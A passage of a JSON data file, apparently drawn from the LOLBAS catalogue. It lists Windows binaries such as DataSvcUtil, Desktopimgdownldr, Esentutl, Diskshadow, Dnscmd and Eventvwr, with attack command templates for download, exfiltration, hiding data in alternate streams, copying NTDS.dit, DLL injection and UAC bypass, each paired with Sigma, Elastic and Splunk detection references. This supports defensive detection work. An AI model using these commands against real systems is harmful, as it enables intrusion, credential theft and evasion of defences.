mechanism","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cscript.exe","C:\\Windows\\SysWOW64\\cscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Cscript.exe executing files from alternate data streams"},{"type":"IOC","value":"DotNet CLR libraries loaded into cscript.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - cscript.exe.log"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Cscript/"]},{"id":"lolbas:customshellhost-exe:0","toolId":"lolbas:customshellhost-exe","toolName":"CustomShellHost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"CustomShellHost.exe","description":"Executes explorer.exe (with command-line argument /NoShellRegistrationCheck) if present in the current working folder.","usecase":"Can be used to evade defensive counter-measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\CustomShellHost.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"CustomShellHost.exe is unlikely to run on normal workstations"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml"}],"references":["https://twitter.com/YoSignals/status/1381353520088113154","https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher","https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/"]},{"id":"lolbas:datasvcutil-exe:0","toolId":"lolbas:datasvcutil-exe","toolName":"DataSvcUtil.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"DataSvcUtil /out:{PATH_ABSOLUTE} /uri:{REMOTEURL}","description":"Upload file, credentials or data exfiltration in general","usecase":"Upload file","mitre":["T1567"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml"},{"type":"IOC","value":"The DataSvcUtil.exe tool is installed in the .NET Framework directory."},{"type":"IOC","value":"Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil."}],"references":["https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe","https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services","https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services","https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/"]},{"id":"lolbas:desktopimgdownldr-exe:0","toolId":"lolbas:desktopimgdownldr-exe","toolName":"Desktopimgdownldr.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"set \"SYSTEMROOT=C:\\Windows\\Temp\" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL} /eventName:desktopimgdownldr","description":"Downloads the file and sets it as the computer's lockscreen","usecase":"Download arbitrary files from a web server","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\desktopimgdownldr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml"},{"type":"IOC","value":"desktopimgdownldr.exe that creates non-image file"},{"type":"IOC","value":"Change of HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PersonalizationCSP\\LockScreenImageUrl"}],"references":["https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/","https://lolbas-project.github.io/lolbas/Binaries/Desktopimgdownldr/"]},{"id":"lolbas:devicecredentialdeployment-exe:0","toolId":"lolbas:devicecredentialdeployment-exe","toolName":"DeviceCredentialDeployment.exe","name":"Conceal","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Conceal"],"command":"DeviceCredentialDeployment","description":"Grab the console window handle and set it to hidden","usecase":"Can be used to stealthily run a console application (e.g. cmd.exe) in the background","mitre":["T1564"],"privilege":"user","fullPath":["C:\\Windows\\System32\\DeviceCredentialDeployment.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"DeviceCredentialDeployment.exe should not be run on a normal workstation"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/DeviceCredentialDeployment/"]},{"id":"lolbas:dfsvc-exe:0","toolId":"lolbas:dfsvc-exe","toolName":"Dfsvc.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}","description":"Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)","usecase":"Use binary to bypass Application whitelisting","mitre":["T1127.002"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe","https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/"]},{"id":"lolbas:diantz-exe:0","toolId":"lolbas:diantz-exe","toolName":"Diantz.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"diantz.exe {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:targetFile.cab","description":"Compress a file (first argument) into a CAB file stored in the Alternate Data Stream (ADS) of the target file.","usecase":"Hide data compressed into an Alternate Data Stream.","mitre":["T1564.004"],"privilege":"user","fullPath":["c:\\windows\\system32\\diantz.exe","c:\\windows\\syswow64\\diantz.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml"},{"type":"IOC","value":"diantz storing data into alternate data streams."},{"type":"IOC","value":"diantz getting a file from a remote machine or the internet."}],"references":["https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz","https://ss64.com/nt/makecab-directives.html","https://lolbas-project.github.io/lolbas/Binaries/Diantz/"]},{"id":"lolbas:diantz-exe:1","toolId":"lolbas:diantz-exe","toolName":"Diantz.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"diantz.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}","description":"Download and compress a remote file and store it in a CAB file on local machine.","usecase":"Download and compress into a cab file.","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\diantz.exe","c:\\windows\\syswow64\\diantz.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml"},{"type":"IOC","value":"diantz storing data into alternate data streams."},{"type":"IOC","value":"diantz getting a file from a remote machine or the internet."}],"references":["https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz","https://ss64.com/nt/makecab-directives.html","https://lolbas-project.github.io/lolbas/Binaries/Diantz/"]},{"id":"lolbas:diantz-exe:2","toolId":"lolbas:diantz-exe","toolName":"Diantz.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"diantz /f {PATH:.ddf}","description":"Execute diantz directives as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.","usecase":"Bypass command-line based detections","mitre":["T1036"],"privilege":"user","fullPath":["c:\\windows\\system32\\diantz.exe","c:\\windows\\syswow64\\diantz.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml"},{"type":"IOC","value":"diantz storing data into alternate data streams."},{"type":"IOC","value":"diantz getting a file from a remote machine or the internet."}],"references":["https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz","https://ss64.com/nt/makecab-directives.html","https://lolbas-project.github.io/lolbas/Binaries/Diantz/"]},{"id":"lolbas:diskshadow-exe:0","toolId":"lolbas:diskshadow-exe","toolName":"Diskshadow.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"diskshadow.exe /s {PATH:.txt}","description":"Execute commands using diskshadow.exe from a prepared diskshadow script.","usecase":"Use diskshadow to exfiltrate data from VSS such as NTDS.dit","mitre":["T1003.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\diskshadow.exe","C:\\Windows\\SysWOW64\\diskshadow.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Child process from diskshadow.exe"}],"references":["https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/","https://lolbas-project.github.io/lolbas/Binaries/Diskshadow/"]},{"id":"lolbas:diskshadow-exe:1","toolId":"lolbas:diskshadow-exe","toolName":"Diskshadow.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"diskshadow> exec {PATH:.exe}","description":"Execute commands using diskshadow.exe to spawn child process","usecase":"Use diskshadow to bypass defensive counter measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\diskshadow.exe","C:\\Windows\\SysWOW64\\diskshadow.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Child process from diskshadow.exe"}],"references":["https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/","https://lolbas-project.github.io/lolbas/Binaries/Diskshadow/"]},{"id":"lolbas:dnscmd-exe:0","toolId":"lolbas:dnscmd-exe","toolName":"Dnscmd.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dnscmd.exe dc1.lab.int /config /serverlevelplugindll {PATH_SMB:.dll}","description":"Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.","usecase":"Remotely inject dll to dns server","mitre":["T1543.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\Dnscmd.exe","C:\\Windows\\SysWOW64\\Dnscmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml"},{"type":"IOC","value":"Dnscmd.exe loading dll from UNC/arbitrary path"}],"references":["https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83","https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html","https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp","https://twitter.com/Hexacorn/status/994000792628719618","http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html","https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/"]},{"id":"lolbas:esentutl-exe:0","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /o","description":"Copies the source VBS file to the destination VBS file.","usecase":"Copies files from A to B","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"]},{"id":"lolbas:esentutl-exe:1","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"esentutl.exe /y {PATH_ABSOLUTE:.exe} /d {PATH_ABSOLUTE}:file.exe /o","description":"Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.","usecase":"Copy file and hide it in an alternate data stream as a defensive counter measure","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"]},{"id":"lolbas:esentutl-exe:2","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"esentutl.exe /y {PATH_ABSOLUTE}:file.exe /d {PATH_ABSOLUTE:.exe} /o","description":"Copies the source Alternate Data Stream (ADS) to the destination EXE.","usecase":"Extract hidden file within alternate data streams","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"]},{"id":"lolbas:esentutl-exe:3","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"esentutl.exe /y {PATH_SMB:.exe} /d {PATH_ABSOLUTE}:file.exe /o","description":"Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.","usecase":"Copy file and hide it in an alternate data stream as a defensive counter measure","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"]},{"id":"lolbas:esentutl-exe:4","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"esentutl.exe /y {PATH_SMB:.source.exe} /d {PATH_SMB:.dest.exe} /o","description":"Copies the source EXE to the destination EXE file","usecase":"Use to copy files from one unc path to another","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"]},{"id":"lolbas:esentutl-exe:5","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"esentutl.exe /y /vss c:\\windows\\ntds\\ntds.dit /d {PATH_ABSOLUTE:.dit}","description":"Copies a (locked) file using Volume Shadow Copy","usecase":"Copy/extract a locked file such as the AD Database","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"]},{"id":"lolbas:eudcedit-exe:0","toolId":"lolbas:eudcedit-exe","toolName":"Eudcedit.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"eudcedit","description":"Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option \"Link with Selected Fonts\" and click on Save As, then in the opened enter the command you want to execute.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"admin","fullPath":["c:\\windows\\system32\\eudcedit.exe","c:\\windows\\syswow64\\eudcedit.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Processes spawned by eudcedit.exe."}],"references":["https://medium.com/@matanb707/windows-fonts-exploitation-in-2025-bypassing-uac-with-eudcedit-915599705639","https://lolbas-project.github.io/lolbas/Binaries/Eudcedit/"]},{"id":"lolbas:eventvwr-exe:0","toolId":"lolbas:eventvwr-exe","toolName":"Eventvwr.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"eventvwr.exe","description":"During startup, eventvwr.exe checks the registry value `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.","usecase":"Execute a binary or script as a high-integrity process without a UAC 